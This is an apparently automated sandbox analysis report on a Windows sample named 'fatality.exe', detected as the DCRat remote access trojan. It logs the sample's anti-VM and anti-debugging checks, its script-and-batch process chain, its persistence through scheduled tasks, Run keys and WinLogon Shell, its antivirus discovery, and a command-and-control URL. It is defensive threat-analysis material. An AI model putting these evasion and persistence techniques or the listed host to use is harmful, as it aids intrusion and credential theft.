                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_05256861 NtQueryInformationProcess,GetSystemInfo,0_2_05256861
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: fatality.exe, 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VBoxService.exe
                                    Source: wscript.exe, 00000002.00000003.2152465564.0000000003366000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: fatality.exe, fatality.exe, 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ~VirtualMachineTypes
                                    Source: fatality.exe, 00000000.00000003.2048896610.0000000003436000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\d
                                    Source: fatality.exe, fatality.exe, 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ]DLL_Loader_VirtualMachine
                                    Source: fatality.exe, 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: VMWare
                                    Source: fatality.exe, 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
                                    Source: fatality.exe, 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: &VBoxService.exe
                                    Source: mQBLhXIPAJ.exe, 00000013.00000002.2301749702.000000001B0A0000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000024.00000002.2272127454.0000028265E07000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002B.00000002.2340738507.0000016EAD127000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\fatality.exeProcess information queried: ProcessInformationJump to behavior

                                    Anti Debugging

                                    Source: C:\Users\user\Desktop\fatality.exeThread information set: HideFromDebuggerJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeOpen window title or class name: ollydbg
                                    Source: C:\Users\user\Desktop\fatality.exeFile opened: SIWDEBUG
                                    Source: C:\Users\user\Desktop\fatality.exeFile opened: NTICE
                                    Source: C:\Users\user\Desktop\fatality.exeFile opened: SICE
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00E07DEE mov eax, dword ptr fs:[00000030h]0_2_00E07DEE
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_05256069 mov eax, dword ptr fs:[00000030h]0_2_05256069
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_05256393 mov eax, dword ptr fs:[00000030h]0_2_05256393
                                    Source: C:\blockcomSession\containerReview.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess token adjusted: Debug
                                    Source: C:\blockcomSession\containerReview.exeProcess token adjusted: Debug
                                    Source: C:\blockcomSession\containerReview.exeProcess token adjusted: Debug
                                    Source: C:\ProgramData\dbg\containerReview.exeProcess token adjusted: Debug
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess token adjusted: Debug
                                    Source: C:\blockcomSession\containerReview.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DFB7E0 __EH_prolog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,GetDlgItemTextW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,_swprintf,_swprintf,_swprintf,ShellExecuteExW,_swprintf,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongW,SetWindowLongW,SetDlgItemTextW,_wcslen,_swprintf,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetWindowTextW,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EnableWindow,SendMessageW,SetDlgItemTextW,0_2_00DFB7E0
                                    Source: C:\Users\user\Desktop\fatality.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\blockcomSession\R3z0peym99fhJdrKbUwEGrQMoM2HpnSPGrE0X0k2hc.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\blockcomSession\containerReview.exe "C:\blockcomSession/containerReview.exe"Jump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qvvd4xnd\qvvd4xnd.cmdline"Jump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glp1j4aa\glp1j4aa.cmdline"Jump to behavior
                                    Source: C:\blockcomSession\containerReview.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat" Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8539.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC4E919528C4A844BA8820AEF1C7C5AE5.TMP"Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87BA.tmp" "c:\Windows\System32\CSCBCEC8111DA4C46C5BB72BE8163F3D647.TMP"Jump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2BGdjLelXV.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\dbg\containerReview.exe "C:\Users\All Users\dbg\containerReview.exe"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\blockcomSession\mQBLhXIPAJ.exe "C:\blockcomSession\mQBLhXIPAJ.exe"
                                    Source: C:\Users\user\Desktop\fatality.exeCode function: 0_2_00DFF654 cpuid 0_2_00DFF654
                                    Source: C:\blockcomSession\containerReview.exeQueries volume information: C:\blockcomSession\containerReview.exe VolumeInformationJump to behavior
                                    Source: C:\blockcomSession\containerReview.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeQueries volume information: C:\blockcomSession\mQBLhXIPAJ.exe VolumeInformationJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeQueries volume information: C:\blockcomSession\mQBLhXIPAJ.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\blockcomSession\containerReview.exeQueries volume information: C:\blockcomSession\containerReview.exe VolumeInformation
                                    Source: C:\blockcomSession\containerReview.exeQueries volume information: C:\blockcomSession\containerReview.exe VolumeInformation
                                    Source: C:\ProgramData\dbg\containerReview.exeQueries volume information: C:\ProgramData\dbg\containerReview.exe VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exeQueries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe VolumeInformation
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeQueries volume information: C:\blockcomSession\mQBLhXIPAJ.exe VolumeInformation
                                    Source: C:\blockcomSession\containerReview.exeQueries volume information: C:\blockcomSession\containerReview.exe VolumeInformation
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: mQBLhXIPAJ.exe, 00000013.00000002.2301749702.000000001B0FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                    Source: mQBLhXIPAJ.exe, 00000013.00000002.2301749702.000000001B13C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws Defender\MsMpeng.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\blockcomSession\mQBLhXIPAJ.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    Source: Yara matchFile source: 00000005.00000002.2227774812.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: containerReview.exe PID: 6536, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: mQBLhXIPAJ.exe PID: 2172, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: mQBLhXIPAJ.exe PID: 5624, type: MEMORYSTR
                                    Source: Yara matchFile source: fatality.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61276fb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61236fb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61236fb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.containerReview.exe.780000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61276fb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000005.00000000.2154251143.0000000000782000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2039419279.0000000005FE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2038554623.0000000005FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ProgramData\dbg\containerReview.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockcomSession\containerReview.exe, type: DROPPED

                                    Remote Access Functionality

                                    Source: Yara matchFile source: 00000005.00000002.2227774812.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: containerReview.exe PID: 6536, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: mQBLhXIPAJ.exe PID: 2172, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: mQBLhXIPAJ.exe PID: 5624, type: MEMORYSTR
                                    Source: Yara matchFile source: fatality.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61276fb.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61236fb.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61236fb.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.containerReview.exe.780000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.fatality.exe.61276fb.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000005.00000000.2154251143.0000000000782000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2039419279.0000000005FE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2038554623.0000000005FE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\ProgramData\dbg\containerReview.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\blockcomSession\containerReview.exe, type: DROPPED
                                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts241
                                    Windows Management Instrumentation
                                    11
                                    Scripting
                                    1
                                    Exploitation for Privilege Escalation
                                    1
                                    Disable or Modify Tools
                                    OS Credential Dumping3
                                    File and Directory Discovery
                                    1
                                    Taint Shared Content
                                    1
                                    Archive Collected Data
                                    1
                                    Encrypted Channel
                                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts3
                                    Command and Scripting Interpreter
                                    1
                                    DLL Side-Loading
                                    1
| DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 45 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 11 Process Injection | 3 Obfuscated Files or Information | Security Account Manager | 451 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | 21 Registry Run Keys / Startup Folder | 1 Scheduled Task/Job | 14 Software Packing | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Registry Run Keys / Startup Folder | 1 DLL Side-Loading | LSA Secrets | 361 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 33 Masquerading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 361 Virtualization/Sandbox Evasion | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
| Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
[Behavior graph: ID 1589980, Sample: fatality.exe, Start date: 13/01/2025, Architecture: WINDOWS, Score: 100]

| Source | Detection | Scanner | Label | Link |
| fatality.exe | 84% | Virustotal | | Browse |
| fatality.exe | 71% | ReversingLabs | Win32.Trojan.DCRat | |
| fatality.exe | 100% | Avira | VBS/Runner.VPG | |
| fatality.exe | 100% | Joe Sandbox ML | | |

| Source | Detection | Scanner | Label | Link |
| C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe | 100% | Avira | TR/Spy.Agent.cptjt | |
| C:\Users\user\Desktop\RUDRugHQ.log | 100% | Avira | TR/PSW.Agent.qngqt | |
| C:\ProgramData\dbg\containerReview.exe | 100% | Avira | TR/Spy.Agent.cptjt | |
| C:\blockcomSession\RezYUes00TmmVGwINjr2qWMSbF3Etb9Bt2Ra62zGWDtewTBc.vbe | 100% | Avira | VBS/Runner.VPG | |
| C:\Users\user\Desktop\jPEOVQoM.log | 100% | Avira | TR/PSW.Agent.qngqt | |
| C:\Users\user\AppData\Local\Temp\2BGdjLelXV.bat | 100% | Avira | BAT/Delbat.C | |
| C:\blockcomSession\containerReview.exe | 100% | Avira | TR/Spy.Agent.cptjt | |
| C:\Users\user\Desktop\GgZbKUMi.log | 100% | Avira | TR/AVI.Agent.updqb | |
| C:\Users\user\Desktop\HTJtRROP.log | 100% | Avira | TR/AVI.Agent.updqb | |
| C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat | 100% | Avira | BAT/Delbat.C | |
| C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe | 100% | Joe Sandbox ML | | |
| C:\Windows\System32\SecurityHealthSystray.exe | 100% | Joe Sandbox ML | | |
| C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\RUDRugHQ.log | 100% | Joe Sandbox ML | | |
| C:\ProgramData\dbg\containerReview.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\nCWNxMEA.log | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\jPEOVQoM.log | 100% | Joe Sandbox ML | | |
| C:\blockcomSession\containerReview.exe | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\RLUzQxgL.log | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\VquIdqjl.log | 100% | Joe Sandbox ML | | |
| C:\Users\user\Desktop\yCQlabwB.log | 100% | Joe Sandbox ML | | |
| C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper | |
| C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper | |
| C:\ProgramData\dbg\containerReview.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper | |
| C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\mQBLhXIPAJ.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper | |
| C:\Users\user\Desktop\GgZbKUMi.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\HTJtRROP.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\LTranRbW.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic | |
| C:\Users\user\Desktop\PRRjZxCV.log | 25% | ReversingLabs | | |
| C:\Users\user\Desktop\RLUzQxgL.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\RUDRugHQ.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\VquIdqjl.log | 8% | ReversingLabs | | |
| C:\Users\user\Desktop\eTDxNkzS.log | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Generic | |
| C:\Users\user\Desktop\jPEOVQoM.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat | |
| C:\Users\user\Desktop\nCWNxMEA.log | 29% | ReversingLabs | Win32.Trojan.Generic | |
| C:\Users\user\Desktop\ucFnGTXv.log | 25% | ReversingLabs | | |
| C:\Users\user\Desktop\yCQlabwB.log | 29% | ReversingLabs | Win32.Trojan.Generic | |
| C:\blockcomSession\containerReview.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper | |
| C:\blockcomSession\mQBLhXIPAJ.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.Dnoper | |
                                    No Antivirus matches
                                    No Antivirus matches
| Source | Detection | Scanner | Label | Link |
| http://373292cm.nyashka.top | 0% | Avira URL Cloud | safe | |
| http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php | 0% | Avira URL Cloud | safe | |
| http://373292cm.nyashka.top/ | 0% | Avira URL Cloud | safe | |
| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
| 373292cm.nyashka.top | unknown | unknown | false | | unknown |
| 15.164.165.52.in-addr.arpa | unknown | unknown | false | | high |
| Name | Source | Malicious | Antivirus Detection | Reputation |
| http://373292cm.nyashka.top/ | mQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.enigmaprotector.com/ | fatality.exe, 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp | false | | high |
| http://373292cm.nyashka.top | mQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | containerReview.exe, 00000005.00000002.2220599721.0000000002E4D000.00000004.00000800.00020000.00000000.sdmp, mQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmp | false | | high |
| http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.php | mQBLhXIPAJ.exe, 00000013.00000002.2290300751.0000000002908000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://www.enigmaprotector.com/openU | fatality.exe, 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp | false | | high |
                                              No contacted IP infos
                                              Joe Sandbox version:42.0.0 Malachite
                                              Analysis ID:1589980
                                              Start date and time:2025-01-13 12:47:08 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 10m 15s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:58
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:fatality.exe
                                              Detection:MAL
                                              Classification:mal100.spre.troj.expl.evad.winEXE@58/46@10/0
                                              EGA Information:
                                              • Successful, ratio: 10%
                                              HCA Information:Failed
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe
                                              • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45, 52.165.164.15, 4.245.163.56
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target containerReview.exe, PID 6536 because it is empty
                                              • Execution Graph export aborted for target containerReview.exe, PID 7200 because it is empty
                                              • Execution Graph export aborted for target containerReview.exe, PID 7216 because it is empty
                                              • Execution Graph export aborted for target containerReview.exe, PID 7368 because it is empty
                                              • Execution Graph export aborted for target containerReview.exe, PID 7696 because it is empty
                                              • Execution Graph export aborted for target mQBLhXIPAJ.exe, PID 2172 because it is empty
                                              • Execution Graph export aborted for target mQBLhXIPAJ.exe, PID 5624 because it is empty
                                              • Execution Graph export aborted for target mQBLhXIPAJ.exe, PID 7508 because it is empty
                                              • Execution Graph export aborted for target mQBLhXIPAJ.exe, PID 7600 because it is empty
                                              • Not all processes were analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
| Time | Type | Description |
| 06:48:24 | API Interceptor | 1x Sleep call for process: mQBLhXIPAJ.exe modified |
| 12:48:16 | Task Scheduler | Run new task: mQBLhXIPAJ path: "C:\blockcomSession\mQBLhXIPAJ.exe" |
| 12:48:16 | Task Scheduler | Run new task: mQBLhXIPAJm path: "C:\blockcomSession\mQBLhXIPAJ.exe" |
| 12:48:19 | Task Scheduler | Run new task: containerReview path: "C:\blockcomSession\containerReview.exe" |
| 12:48:19 | Task Scheduler | Run new task: containerReviewc path: "C:\blockcomSession\containerReview.exe" |
| 12:48:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJ "C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe" |
| 12:48:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run containerReview "C:\blockcomSession\containerReview.exe" |
| 12:48:35 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJ "C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe" |
| 12:48:43 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run containerReview "C:\blockcomSession\containerReview.exe" |
| 12:48:52 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run mQBLhXIPAJ "C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe" |
| 12:49:00 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run containerReview "C:\blockcomSession\containerReview.exe" |
| 12:49:16 | Autostart | Run: WinLogon Shell "C:\Program Files\7-Zip\Lang\mQBLhXIPAJ.exe" |
| 12:49:24 | Autostart | Run: WinLogon Shell "C:\blockcomSession\mQBLhXIPAJ.exe" |
| 12:49:32 | Autostart | Run: WinLogon Shell "C:\Users\All Users\dbg\containerReview.exe" |
| 12:49:40 | Autostart | Run: WinLogon Shell "C:\Users\Default\Templates\mQBLhXIPAJ.exe" |
| 12:49:49 | Autostart | Run: WinLogon Shell "C:\Program Files\Windows Security\BrowserCore\en-US\mQBLhXIPAJ.exe" |
| 12:49:57 | Autostart | Run: WinLogon Shell "C:\blockcomSession\containerReview.exe" |
                                              No context
                                              No context
                                              No context
                                              No context
| Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
| C:\Users\user\Desktop\GgZbKUMi.log | OneDriveStandaloneUpdater.exe | Get hash | malicious | DCRat | Browse | |
| | 85D5ktqjpd.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | |
| | VIyu4dC9CU.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | |
| | top.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | |
